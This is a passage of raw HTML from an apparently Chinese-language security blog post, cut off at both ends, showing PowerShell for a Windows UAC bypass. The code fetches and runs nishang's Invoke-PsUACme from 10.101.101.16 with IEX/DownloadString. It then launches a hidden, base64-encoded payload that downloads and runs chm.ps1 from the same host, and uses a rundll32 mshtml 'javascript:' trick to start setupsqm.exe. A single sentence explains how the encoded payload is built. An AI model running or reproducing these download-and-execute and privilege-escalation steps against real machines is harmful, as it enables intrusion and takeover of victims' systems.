inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/nishang/Escalation/Invoke-PsUACme.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7b3447538344-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7b3447538344-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">PsUACme</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">method</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">oobe</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Payload</span>&nbsp;<span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;powershell&nbsp;-win&nbsp;hidden&nbsp;-enc&nbsp;SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwADEALgAxADAAMQAuADEANgAvAGMAaABtAC4AcABzADEAJwApAA==&#39;</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7b3447538344-4" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7b3447538344-5" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Start</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Process</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">FilePath</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">rundll32</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">exe</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">ArgumentList</span>&nbsp;<span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;javascript:"..\mshtml,RunHTMLApplication&nbsp;";new%20ActiveXObject("WScript.Shell").Run("C:/Windows/System32/oobe/setupsqm.exe",0,true);self.close();&#39;</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">而其中enc后面的数据是经过下面的代码编码而成：</p><div id="crayon-5c25a60d4f7b8233318753" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">4</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">5</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 839.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7b8233318753-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">command</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"IEX (New-Object Net.WebClient).DownloadString(&#39;http://10.101.101.16/chm.ps1&#39;)"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7b8233318753-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7b8233318753-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">bytes</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">[</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Text</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Encoding</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">]</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">::</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Unicode</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">GetBytes</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">command</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">encodedCommand</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; 